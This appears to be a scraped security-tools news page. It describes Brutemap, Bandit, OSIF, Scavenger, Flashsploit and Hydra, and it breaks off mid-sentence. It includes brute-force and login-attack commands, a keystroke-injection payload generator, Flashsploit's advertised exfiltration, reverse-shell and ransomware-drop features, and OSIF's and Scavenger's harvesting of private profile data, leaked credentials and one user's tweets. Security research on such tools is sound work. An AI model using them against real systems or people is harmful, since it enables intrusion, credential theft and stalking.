  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded


Acunetix Vulnerability Scanner Now With Network Security Scans


User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.

Seamless OpenVAS integration now also available on Windows and Linux

London, UK – May 2019 – Acunetix, the pioneer in automated web application security software, has announced that all versions of the Acunetix Vulnerability Scanner now support network security scanning. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.
“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.

There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as issue tracker integration and comprehensive reporting.

More Features in the Latest Build

OpenVAS integration is introduced as part of the latest Acunetix version 12 build (build 12.0.190515149). This new build also includes:
  • Support for IPv6
  • Improved usage of machine resources
  • Added support for Selenium scripts as import files
  • Multiple vulnerability checks for SAP
  • Unauthorized access detection for Redis and Memcached
  • Source code disclosure for Ruby and Python
The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found here.

Get a demo of the product here.



Brutemap - Tool That Automates Testing Accounts To The Site's Login Page


Brutemap is an open source penetration testing tool that automates testing accounts against a site's login page, based on dictionary attack. With it, you no longer need to search for other brute-force tools, and you no longer need to ask "what CMS is this?" just to find the form parameters, because Brutemap will find them automatically (a rough sketch of the idea follows this paragraph). Brutemap is also equipped with an attack method that makes it easy to do account checking or to test forms with the SQL injection authentication-bypass technique.
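A rough sketch of automatic form-parameter discovery using Selenium (hypothetical selectors; Brutemap's own detection logic is more involved):
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options

def find_login_fields(url):
    # Return the guessed (username, password) input names from a login page.
    opts = Options()
    opts.add_argument("--headless")
    driver = webdriver.Chrome(options=opts)
    try:
        driver.get(url)
        password = driver.find_element(By.CSS_SELECTOR, "input[type='password']")
        username = driver.find_element(
            By.CSS_SELECTOR, "input[type='text'], input[type='email']")
        return username.get_attribute("name"), password.get_attribute("name")
    finally:
        driver.quit()

print(find_login_fields("http://www.example.com/admin/login.php"))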


Installation
Brutemap uses Selenium to interact with the website, so you need to install a web driver for Selenium first. See here. If you have the git package installed, you only need to clone the Git repository, like this:
$ git clone https://github.com/brutemap-dev/brutemap.git
And, install the required modules:
$ pip install -r requirements.txt


Usage
For basic use:
$ python brutemap.py -t http://www.example.com/admin/login.php -u admin -p default
To display a list of available options:
$ python brutemap.py -h
You can find examples of brutemap usage here. For more information about available options, you can visit the User's manual.

Video



Links


Bandit - Tool Designed To Find Common Security Issues In Python Code


Bandit is a tool designed to find common security issues in Python code. To do this Bandit processes each file, builds an AST from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report.
Bandit was originally developed within the OpenStack Security Project and later rehomed to PyCQA.

Installation
Bandit is distributed on PyPI. The best way to install it is with pip:
Create a virtual environment (optional):
virtualenv bandit-env
Install Bandit:
pip install bandit
# Or if you're working with a Python 3 project
pip3 install bandit
Run Bandit:
bandit -r path/to/your/code
Bandit can also be installed from source. To do so, download the source tarball from PyPI, then install it:
python setup.py install


Usage
Example usage across a code tree:
bandit -r ~/your_repos/project
Example usage across the examples/ directory, showing three lines of context and only reporting on the high-severity issues:
bandit examples/*.py -n 3 -lll
Bandit can be run with profiles. To run Bandit against the examples directory using only the plugins listed in the ShellInjection profile:
bandit examples/*.py -p ShellInjection
Bandit also supports passing lines of code to scan using standard input. To run Bandit with standard input:
cat examples/imports.py | bandit -
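For a sense of what such a run reports, here is a small, deliberately insecure example file with patterns Bandit flags out of the box (hardcoded password, shell=True, assert); scanning it with bandit insecure_example.py should yield findings from the test list shown in the help output below:
# insecure_example.py - intentionally bad code for a test scan.
import subprocess

password = "hunter2"          # hardcoded password string (B105)

def copy_file(src, dst):
    # subprocess call with shell=True (B602)
    subprocess.Popen("cp %s %s" % (src, dst), shell=True)

def check(user):
    assert user is not None   # use of assert (B101)
    return user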
Usage:
$ bandit -h
usage: bandit [-h] [-r] [-a {file,vuln}] [-n CONTEXT_LINES] [-c CONFIG_FILE]
[-p PROFILE] [-t TESTS] [-s SKIPS] [-l] [-i]
[-f {csv,custom,html,json,screen,txt,xml,yaml}]
[--msg-template MSG_TEMPLATE] [-o [OUTPUT_FILE]] [-v] [-d] [-q]
[--ignore-nosec] [-x EXCLUDED_PATHS] [-b BASELINE]
[--ini INI_PATH] [--version]
[targets [targets ...]]

Bandit - a Python source code security analyzer

positional arguments:
targets source file(s) or directory(s) to be tested

optional arguments:
-h, --help show this help message and exit
-r, --recursive find and process files in subdirectories
-a {file,vuln}, --aggregate {file,vuln}
aggregate output by vulnerability (default) or by
filename
-n CONTEXT_LINES, --number CONTEXT_LINES
maximum number of code lines to output for each issue
-c CONFIG_FILE, --configfile CONFIG_FILE
optional config file to use for selecting plugins and
overriding defaults
-p PROFILE, --profile PROFILE
profile to use (defaults to executing all tests)
-t TESTS, --tests TESTS
comma-separated list of test IDs to run
-s SKIPS, --skip SKIPS
comma-separated list of test IDs to skip
-l, --level report only issues of a given severity level or higher
(-l for LOW, -ll for MEDIUM, -lll for HIGH)
-i, --confidence report only issues of a given confidence level or
higher (-i for LOW, -ii for MEDIUM, -iii for HIGH)
-f {csv,custom,html,json,screen,txt,xml,yaml}, --format {csv,custom,html,json,screen,txt,xml,yaml}
specify output format
--msg-template MSG_TEMPLATE
specify output message template (only usable with
--format custom), see CUSTOM FORMAT section for list
of available values
-o [OUTPUT_FILE], --output [OUTPUT_FILE]
write report to filename
-v, --verbose output extra information like excluded and included
files
-d, --debug turn on debug mode
-q, --quiet, --silent
only show output in the case of an error
--ignore-nosec do not skip lines with # nosec comments
-x EXCLUDED_PATHS, --exclude EXCLUDED_PATHS
comma-separated list of paths (glob patterns supported)
to exclude from scan (note that these are in addition
to the excluded paths provided in the config file)
-b BASELINE, --baseline BASELINE
path of a baseline report to compare against (only
JSON-formatted files are accepted)
--ini INI_PATH path to a .bandit file that supplies command line
arguments
--version show program's version number and exit

CUSTOM FORMATTING
-----------------

Available tags:

{abspath}, {relpath}, {line}, {test_id},
{severity}, {msg}, {confidence}, {range}

Example usage:

Default template:
bandit -r examples/ --format custom --msg-template \
"{abspath}:{line}: {test_id}[bandit]: {severity}: {msg}"

Provides same output as:
bandit -r examples/ --format custom

Tags can also be formatted in python string.format() style:
bandit -r examples/ --format custom --msg-template \
"{relpath:20.20s}: {line:03}: {test_id:^8}: DEFECT: {msg:>20}"

See python documentation for more information about formatting style:
https://docs.python.org/3.4/library/string.html

The following tests were discovered and loaded:
-----------------------------------------------

B101 assert_used
B102 exec_used
B103 set_bad_file_permissions
B104 hardcoded_bind_all_interfaces
B105 hardcoded_password_string
B106 hardcoded_password_funcarg
B107 hardcoded_password_default
B108 hardcoded_tmp_directory
B110 try_except_pass
B112 try_except_continue
B201 flask_debug_true
B301 pickle
B302 marshal
B303 md5
B304 ciphers
B305 cipher_modes
B306 mktemp_q
B307 eval
B308 mark_safe
B309 httpsconnection
B310 urllib_urlopen
B311 random
B312 telnetlib
B313 xml_bad_cElementTree
B314 xml_bad_ElementTree
B315 xml_bad_expatreader
B316 xml_bad_expatbuilder
B317 xml_bad_sax
B318 xml_bad_minidom
B319 xml_bad_pulldom
B320 xml_bad_etree
B321 ftplib
B322 input
B323 unverified_context
B324 hashlib_new_insecure_functions
B325 tempnam
B401 import_telnetlib
B402 import_ftplib
B403 import_pickle
B404 import_subprocess
B405 import_xml_etree
B406 import_xml_sax
B407 import_xml_expat
B408 import_xml_minidom
B409 import_xml_pulldom
B410 import_lxml
B411 import_xmlrpclib
B412 import_httpoxy
B413 import_pycrypto
B501 request_with_no_cert_validation
B502 ssl_with_bad_version
B503 ssl_with_bad_defaults
B504 ssl_with_no_version
B505 weak_cryptographic_key
B506 yaml_load
B507 ssh_no_host_key_verification
B601 paramiko_calls
B602 subprocess_popen_with_shell_equals_true
B603 subprocess_without_shell_equals_true
B604 any_other_function_with_shell_equals_true
B605 start_process_with_a_shell
B606 start_process_with_no_shell
B607 start_process_with_partial_path
B608 hardcoded_sql_expressions
B609 linux_commands_wildcard_injection
B610 django_extra_used
B611 django_rawsql_used
B701 jinja2_autoescape_false
B702 use_of_mako_templates
B703 django_mark_safe


Baseline
Bandit allows specifying the path of a baseline report to compare against using the baseline argument (i.e. -b BASELINE or --baseline BASELINE).
bandit -b BASELINE
This is useful for ignoring known vulnerabilities that you believe are non-issues (e.g. a cleartext password in a unit test). To generate a baseline report simply run Bandit with the output format set to json (only JSON-formatted files are accepted as a baseline) and output file path specified:
bandit -f json -o PATH_TO_OUTPUT_FILE


Version control integration
Use pre-commit. Once you have it installed, add this to the .pre-commit-config.yaml in your repository (be sure to update rev to point to a real git tag/revision!):
repos:
  - repo: https://github.com/PyCQA/bandit
    rev: '' # Update me!
    hooks:
      - id: bandit
Then run pre-commit install and you're ready to go.


Configuration
An optional config file may be supplied and may include:
  • lists of tests which should or shouldn't be run
  • exclude_dirs - sections of the path, that if matched, will be excluded from scanning (glob patterns supported)
  • overridden plugin settings - may provide different settings for some plugins


Per Project Command Line Args
Projects may include a .bandit file that specifies command line arguments that should be supplied for that project. The currently supported arguments are:
  • targets: comma separated list of target dirs/files to run bandit on
  • exclude: comma separated list of excluded paths
  • skips: comma separated list of tests to skip
  • tests: comma separated list of tests to run
To use this, put a .bandit file in your project's directory. For example:
[bandit]
exclude: /test
[bandit]
tests: B101,B102,B301


Exclusions
In the event that a line of code triggers a Bandit issue, but the line has been reviewed and the issue is a false positive or acceptable for some other reason, the line can be marked with a # nosec and any results associated with it will not be reported.
For example, although this line may cause Bandit to report a potential security issue, it will not be reported:
self.process = subprocess.Popen('/bin/echo', shell=True)  # nosec


Vulnerability Tests
Vulnerability tests or "plugins" are defined in files in the plugins directory.
Tests are written in Python and are autodiscovered from the plugins directory. Each test can examine one or more type of Python statements. Tests are marked with the types of Python statements they examine (for example: function call, string, import, etc).
Tests are executed by the BanditNodeVisitor object as it visits each node in the AST.
Test results are maintained in the BanditResultStore and aggregated for output at the completion of a test run.


Writing Tests
To write a test:
  • Identify a vulnerability to build a test for, and create a new file in examples/ that contains one or more cases of that vulnerability.
  • Consider the vulnerability you're testing for, mark the function with one or more of the appropriate decorators: - @checks('Call') - @checks('Import', 'ImportFrom') - @checks('Str')
  • Create a new Python source file to contain your test, you can reference existing tests for examples.
  • The function that you create should take a parameter "context" which is an instance of the context class you can query for information about the current element being examined. You can also get the raw AST node for more advanced use cases. Please see the context.py file for more.
  • Extend your Bandit configuration file as needed to support your new test.
  • Execute Bandit against the test file you defined in examples/ and ensure that it detects the vulnerability. Consider variations on how this vulnerability might present itself and extend the example file and the test function accordingly.


Extending Bandit
Bandit allows users to write and register extensions for checks and formatters. Bandit will load plugins from two entry-points:
  • bandit.formatters
  • bandit.plugins
Formatters need to accept 4 things:
  • result_store: An instance of bandit.core.BanditResultStore
  • file_list: The list of files which were inspected in the scope
  • scores: The scores awarded to each file in the scope
  • excluded_files: The list of files that were excluded from the scope
Plugins tend to take advantage of the bandit.checks decorator, which allows the author to register a check for a particular type of AST node. For example:
@bandit.checks('Call')
def prohibit_unsafe_deserialization(context):
    if 'unsafe_load' in context.call_function_name_qual:
        return bandit.Issue(
            severity=bandit.HIGH,
            confidence=bandit.HIGH,
            text="Unsafe deserialization detected."
        )
To register your plugin, you have two options:
  1. If you're using setuptools directly, add something like the following to your setup call:
    # If you have an imaginary bson formatter in the bandit_bson module
    # and a function called `formatter`.
    entry_points={'bandit.formatters': ['bson = bandit_bson:formatter']}
    # Or a check for using mako templates in bandit_mako that
    entry_points={'bandit.plugins': ['mako = bandit_mako']}
  2. If you're using pbr, add something like the following to your setup.cfg file:
    [entry_points]
    bandit.formatters =
    bson = bandit_bson:formatter
    bandit.plugins =
    mako = bandit_mako


Contributing
Contributions to Bandit are always welcome!
The best way to get started with Bandit is to grab the source:
git clone https://github.com/PyCQA/bandit.git
You can test any changes with tox:
pip install tox
tox -e pep8
tox -e py27
tox -e py35
tox -e docs
tox -e cover
Please make pull requests using your own branch, and not master:
git checkout -b mychange
git push origin mychange


Reporting Bugs
Bugs should be reported on github. To file a bug against Bandit, visit: https://github.com/PyCQA/bandit/issues


Under Which Version of Python Should I Install Bandit?
The answer to this question depends on the project(s) you will be running Bandit against. If your project is only compatible with Python 2.7, you should install Bandit to run under Python 2.7. If your project is only compatible with Python 3.5, you should install Bandit to run under Python 3.5. If your project supports both, you could run Bandit with both versions, but you don't have to.
Bandit uses the ast module from Python's standard library in order to analyze your Python code. The ast module is only able to parse Python code that is valid in the version of the interpreter from which it is imported. In other words, if you try to use Python 2.7's ast module to parse code written for 3.5 that uses, for example, yield from with asyncio, then you'll have syntax errors that will prevent Bandit from working properly. Alternatively, if you are relying on 2.7's octal notation of 0777 then you'll have a syntax error if you run Bandit on 3.x.


References
Bandit docs: https://bandit.readthedocs.io/en/latest/
Python AST module documentation: https://docs.python.org/2/library/ast.html
Green Tree Snakes - the missing Python AST docs: https://greentreesnakes.readthedocs.org/en/latest/
Documentation of the various types of AST nodes that Bandit currently covers or could be extended to cover: https://greentreesnakes.readthedocs.org/en/latest/nodes.html


OSIF - Open Source Information Facebook

OSIF is an accurate Facebook account information gathering tool. All sensitive information can be easily gathered even if the target sets all of their privacy settings to (only me): information about residence, date of birth, occupation, phone number and email address.

Installation
$ pkg update upgrade
$ pkg install git python2
$ git clone https://github.com/ciku370/OSIF
$ cd OSIF

Setup
$ pip2 install -r requirements.txt

Running
$ python2 osif.py

Screenshot

  • if you are confused how to use it, please type 'help' to display the help menu
  • [Warn] please turn off your VPN before using this program !!!
  • [Tips] do not overuse this program !!!


Scavenger - Crawler Searching For Credential Leaks On Different Paste Sites


Just the code of my OSINT bot searching for sensitive data leaks on different paste sites.
Search terms:
  • credentials
  • private RSA keys
  • Wordpress configuration files
  • MySQL connect strings
  • onion links
  • links to files hosted inside the onion network (PDF, DOC, DOCX, XLS, XLSX)
Keep in mind:
  1. This bot is not beautiful.
  2. The code is not complete so far. Some parts like integrating the credentials in a database are missing in this online repository.
  3. If you want to use this code, feel free to do so. Keep in mind you have to customize things to make it run on your system.

IMPORTANT
The bot can be run in two major modes:
  • API mode
  • Scraping mode (using TOR)
It is highly recommended to use the API mode. It is the intended method of scraping pastes from Pastebin.com, and it is only fair to do so. The only thing you need is a Pastebin.com PRO account; then whitelist your public IP on their site.
To start the bot in API mode just run the program in the following way:
python run.py -0
However, it is not always possible to use this intended method, as you might be behind NAT and therefore do not have an IP exclusively (whitelisting your IP is not reasonable here). That is why a scraping mode is implemented, where fast TOR cycles in combination with reasonable user agents are used to avoid IP blocking and Cloudflare captchas.
To start the bot in scraping mode run it in the following way:
python run.py -1
Important note: you need the TOR service installed on your system listening on port 9050. Additionally you need to add the following line to your /etc/tor/torrc file.
MaxCircuitDirtiness 30
This sets the maximum cycle time of TOR to 30 seconds.
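A minimal sketch of routing the scraping requests through that local TOR SOCKS port (assuming requests installed with SOCKS support, e.g. requests[socks]; the bot's own implementation differs):
import requests

# TOR's default SOCKS port; with MaxCircuitDirtiness 30, TOR rotates the
# circuit (and usually the exit IP) at most every 30 seconds.
TOR_PROXIES = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

def fetch_over_tor(url):
    return requests.get(url, proxies=TOR_PROXIES, headers=HEADERS, timeout=30).text

print(fetch_over_tor("https://check.torproject.org/")[:200])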

Usage
To learn how to use the software you just need to call the run.py script with the -h/--help argument.
python run.py -h
Output:
  _________
/ _____/ ____ _____ ___ __ ____ ____ ____ ___________
\_____ \_/ ___\\__ \\ \/ // __ \ / \ / ___\_/ __ \_ __ \
/ \ \___ / __ \\ /\ ___/| | \/ /_/ > ___/| | \/
/_______ /\___ >____ /\_/ \___ >___| /\___ / \___ >__|
\/ \/ \/ \/ \//_____/ \/

usage: run.py [-h] [-0] [-1] [-2] [-ps]

Control software for the different modules of this paste crawler.

optional arguments:
-h, --help show this help message and exit
-0, --pastebinCOMapi Activate Pastebin.com module (using API)
-1, --pastebinCOMtor Activate Pastebin.com module (standard scraping using
TOR to avoid IP blocking)
-2, --pasteORG Activate Paste.org module
-ps, --pStatistic Show a simple statistic.
So far I only implemented the Pastebin.com module and I am working on Paste.org. I will add more modules and update this script over time.

Just start the Pastebin.com module separately...
python P_bot.py
Pastes are stored in data/raw_pastes until there are more than 48000 of them. When there are more than 48000, they get filtered, zipped and moved to the archive folder. All pastes which contain credentials are stored in data/files_with_passwords

Keep in mind that at the moment only combinations like USERNAME:PASSWORD and other simple combinations are detected. However, there is a tool to search for proxy logs containing credentials.
You can search for proxy logs (URLs with username and password combinations) by using getProxyLogs.py file
python getProxyLogs.py data/raw_pastes
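A hedged sketch of the kind of simple USERNAME:PASSWORD matching mentioned above (the bot's real filters are more elaborate):
import re

# Very naive: an e-mail-like user part, a colon, then a non-whitespace password.
CRED_RE = re.compile(r"^[\w.+-]+@[\w.-]+\.[A-Za-z]{2,}:\S+$", re.MULTILINE)

def find_credentials(paste_text):
    return CRED_RE.findall(paste_text)

sample = "junk line\nalice@example.com:S3cret!\nbob@example.org:hunter2\n"
print(find_credentials(sample))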

If you want to search the raw data for specific strings you can do it using searchRaw.py (really slow).
python searchRaw.py SEARCHSTRING

To see statistics of the bot just call
python status.py 

The file findSensitiveData.py searches a folder (with pastes) for sensitive data like credit cards, RSA keys or mysqli_connect strings. Keep in mind that this script uses grep and therefore is really slow on a big amount of paste files. If you want to analyze a big amount of pastes I recommend an ELK-Stack.
python findSensitiveData.py data/raw_pastes 

There are two scripts, stalk_user.py and stalk_user_wrapper.py, which can be used to monitor a specific Twitter user. This means every tweet they post gets saved and every contained URL gets downloaded. To start the stalker just execute the wrapper.
python stalk_user_wrapper.py


Flashsploit - Exploitation Framework For ATtiny85 Based HID Attacks


Flashsploit is an exploitation framework for attacks using ATtiny85 HID devices such as the Digispark USB development board. Flashsploit generates Arduino IDE compatible (.ino) scripts based on user input and then starts a listener in Metasploit-Framework if required by the script. In summary: automatic script generation with automated msfconsole.
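As a rough illustration of what generating an Arduino-compatible script from user input can look like, here is a hypothetical Python template assuming the Digispark DigiKeyboard library (not Flashsploit's actual generator):
# Hypothetical sketch: emit a Digispark .ino that opens Run and types a command.
INO_TEMPLATE = '''#include "DigiKeyboard.h"

void setup() {{
  DigiKeyboard.sendKeyStroke(0);                    // wake the HID interface
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);  // Win+R
  DigiKeyboard.delay(500);
  DigiKeyboard.print("{command}");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}}

void loop() {{}}
'''

def write_payload(command, path="payload.ino"):
    with open(path, "w") as fh:
        fh.write(INO_TEMPLATE.format(command=command))

write_payload("powershell -WindowStyle Hidden -Command calc.exe")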


Features
  • TODO : Add Linux and OSX Scripts

Windows

Data Exfiltration
  • Extract all WiFi Passwords and Uploads an XML to SFTP Server:

  • Extract Network Configuration Information of Target System and Uploads to SFTP Server:

  • Extract Passwords and Other Critical Information using Mimikatz and Uploads to SFTP Server:

Reverse Shells
  • Get Reverse Shell by Abusing Microsoft HTML Apps (mshta):

  • Get Reverse Shell by Abusing Certification Authority Utility (certutil)
  • Get Reverse Shell by Abusing Windows Script Host (cscript)
  • Get Reverse Shell by Abusing Windows Installer (msiexec)
  • Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)

Miscellaneous
  • Change Wallpaper of Target Machine:

  • Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage)

  • Drop and Execute a File of your Choice, a ransomware maybe? ;)
  • Disable Windows Defender Service on Target Machine

Tested on
  • Kali Linux 2019.2
  • BlackArch Linux

Dependencies
Flashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS :
  • Metasploit-Framework
  • Python 3
  • SFTP
  • PHP
If you think I should still make an Install Script, Open an issue.

Usage
git clone https://github.com/thewhiteh4t/flashsploit.git 
cd flashsploit
python3 flashsploit.py



Hydra 9.0 - Fast and Flexible Network Login Hacker


Passwords are one of the biggest security holes, as every password security study shows. This tool is proof-of-concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
THIS TOOL IS FOR LEGAL PURPOSES ONLY!
There are already several login hacker tools available; however, none supports more than one protocol to attack or parallelized connects.
It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.
Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
However, the module engine for new services is very easy, so it won't take long until even more services are supported.

WHERE TO GET
You can always find the newest release/production version of hydra at its project page: https://github.com/vanhauser-thc/thc-hydra/releases
If you are interested in the current development state, the public development repository is at GitHub: svn co https://github.com/vanhauser-thc/thc-hydra or git clone https://github.com/vanhauser-thc/thc-hydra
Use the development version at your own risk. It contains new features and new bugs. Things might not work!

HOW TO COMPILE
To configure, compile and install hydra, just type:
./configure
make
make install
If you want the ssh module, you have to set up libssh (not libssh2!) on your system; get it from http://www.libssh.org. For ssh v1 support you also need to add the "-DWITH_SSH1=On" option on the cmake command line. IMPORTANT: If you compile on MacOS then you must do this - do not install libssh via brew!
If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution):
apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
firebird-dev libmemcached-dev
This enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the apple filing protocol - which you will need to download and install from the vendor's web sites.
For all other Linux derivates and BSD based systems, use the system software installer and look for similarly named libraries like in the command above. In all other cases, you have to download all source libraries and compile them manually.

SUPPORTED PLATFORMS
  • All UNIX platforms (Linux, *BSD, Solaris, etc.)
  • MacOS (basically a BSD clone)
  • Windows with Cygwin (both IPv4 and IPv6)
  • Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

HOW TO USE
If you just enter hydra, you will see a short summary of the important options available. Type ./hydra -h to see all available command line options.
Note that NO login/password file is included. Generate them yourself. A default password list is however present, use "dpl4hydra.sh" to generate a list.
For Linux users, a GTK GUI is available, try ./xhydra
For the command line usage, the syntax is as follows:
For attacking one target or a network, you can use the new "://" style:
hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS
The old mode can be used for these too, and additionally, if you want to specify your targets from a text file, you must use this one:
hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]
Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc.
PROTOCOL is the protocol you want to use for attacking, e.g. ftp, smtp, http-get or many others are available.
TARGET is the target you want to attack.
MODULE-OPTIONS are optional values which are special per PROTOCOL module.
FIRST - select your target. You have three options on how to specify the target you want to attack (example invocations follow this list):
  1. a single target on the command line: just put the IP or DNS address in
  2. a network range on the command line: CIDR specification like "192.168.0.0/24"
  3. a list of hosts in a text file: one line per entry (see below)
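Putting those three options together, example invocations (targets and files are placeholders, not from the original text) might look like:
hydra -l admin -P passwords.txt ssh://192.168.0.5
hydra -l admin -P passwords.txt ssh://[192.168.0.0/24]
hydra -l admin -P passwords.txt -M targets.txt ssh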
SECOND - select your protocol. Try to avoid telnet, as it is unreliable for detecting a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target.
THIRD - check if the module has optional parameters: hydra -U PROTOCOL, e.g. hydra -U smtp
FOURTH - the destination port. This is optional! If no port is supplied, the default common port for the PROTOCOL is used. If you specify SSL ("-S" option), the SSL common port is used by default.
If you use the "://" notation, you must use "[" "]" brackets if you want to supply IPv6 addresses or CIDR ("192.168.0.0/24") notations to attack:
hydra [some command line options] ftp://[192.168.0.0/24]/
hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM
Note that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the "-6" command line option. All attacks are then IPv6 only!
If you want to supply your targets via a text file, you cannot use the :// notation; use the old style and just supply the protocol (and module options): hydra [some command line options] -M targets.txt ftp. You can also supply the port for each target entry by adding ":" after a target entry in the file, e.g.:
foo.bar.com
target.com:21
unusual.port.com:2121
default.used.here.com
127.0.0.1
127.0.0.1:2121
Note that if you want to attack IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this:
foo.bar.com
target.com:21
[fe80::1%eth0]
[2001::1]
[2002::2]:8080
[2a01:24a:133:0:00:123:ff:1a]

LOGINS AND PASSWORDS
You have many options on how to attack with logins and passwords. With -l for login and -p for password you tell hydra that this is the only login and/or password to try. With -L for logins and -P for passwords you supply text files with entries, e.g.:
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/
Additionally, you can try passwords based on the login via the "-e" option. The "-e" option has three parameters:
s - try the login as password
n - try an empty password
r - reverse the login and try it as password
If you want to, e.g., try "login as password" and "empty password", you specify "-e sn" on the command line.
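For example, combining a password file with the empty-password and same-as-login checks (an illustrative command, not taken from the original examples):
hydra -l admin -P common_passwords.txt -e ns ftp://localhost/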
But there are two more modes for trying passwords than -p/-P: You can use a text file in which a login and password pair is separated by a colon, e.g.:
admin:password
test:test
foo:bar
This is a common default account style listing that is also generated by the dpl4hydra.sh default account file generator supplied with hydra. You use such a text file with the -C option - note that in this mode you cannot use the -l/-L/-p/-P options (-e nsr however you can). Example:
hydra -C default_accounts.txt ftp://localhost/
And finally, there is a bruteforce mode with the -x option (which you cannot use with -p/-P/-C):
-x minimum_length:maximum_length:charset
The charset definition is: "a" for lowercase letters, "A" for uppercase letters, "1" for numbers, and anything else you supply is taken literally. Examples:
-x 1:3:a generate passwords from length 1 to 3 with all lowercase letters
-x 2:5:/ generate passwords from length 2 to 5 containing only slashes
-x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
Example:
hydra -l ftp -x 3:3:a ftp://localhost/

SPECIAL OPTIONS FOR MODULES
Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it!
To see the special option of a module, type:
hydra -U
e.g.
./hydra -U http-post-form
The special options can be passed via the -m parameter, as 3rd command line option or in the service://target/option format.
Examples (they are all equal):
./hydra -l test -p test -m PLAIN 127.0.0.1 imap
./hydra -l test -p test 127.0.0.1 imap PLAIN
./hydra -l test -p test imap://127.0.0.1/PLAIN

RESTORING AN ABORTED/CRASHED SESSION
When hydra is aborted with Control-C, killed or crashes, it leaves a "hydra.restore" file behind which contains all necessary information to restore the session. This session file is written every 5 minutes. NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX)
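To resume such a session, run hydra with the -R option from the same directory, e.g.:
hydra -R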

HOW TO SCAN/CRACK OVER A PROXY
The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!). The following syntax is valid:
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/"
HYDRA_PROXY_HTTP="proxylist.txt"
The last example is a text file containing up to 64 proxies (in the same format definition as the other examples).
For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax, e.g.:
HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port
for example:
HYDRA_PROXY=connect://proxy.anonymizer.com:8000
HYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080
HYDRA_PROXY=socksproxylist.txt

ADDITIONAL HINTS
  • sort your password files by likelihood and use the -u option to find passwords much faster!
  • uniq your dictionary files! This can save you a lot of time :-) cat words.txt | sort | uniq > dictionary.txt
  • if you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing at least one letter and one number, etc.), use the tool pw-inspector which comes along with the hydra package to reduce the password list: cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt

RESULTS OUTPUT
The results are output to stdout along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported:
  • text - plain text format
  • jsonv1 - JSON data using version 1.x of the schema (defined below).
  • json - JSON data using the latest version of the schema, currently there is only version 1.
If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra.
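For example, to write results to a file in the version 1 JSON format (an illustrative command):
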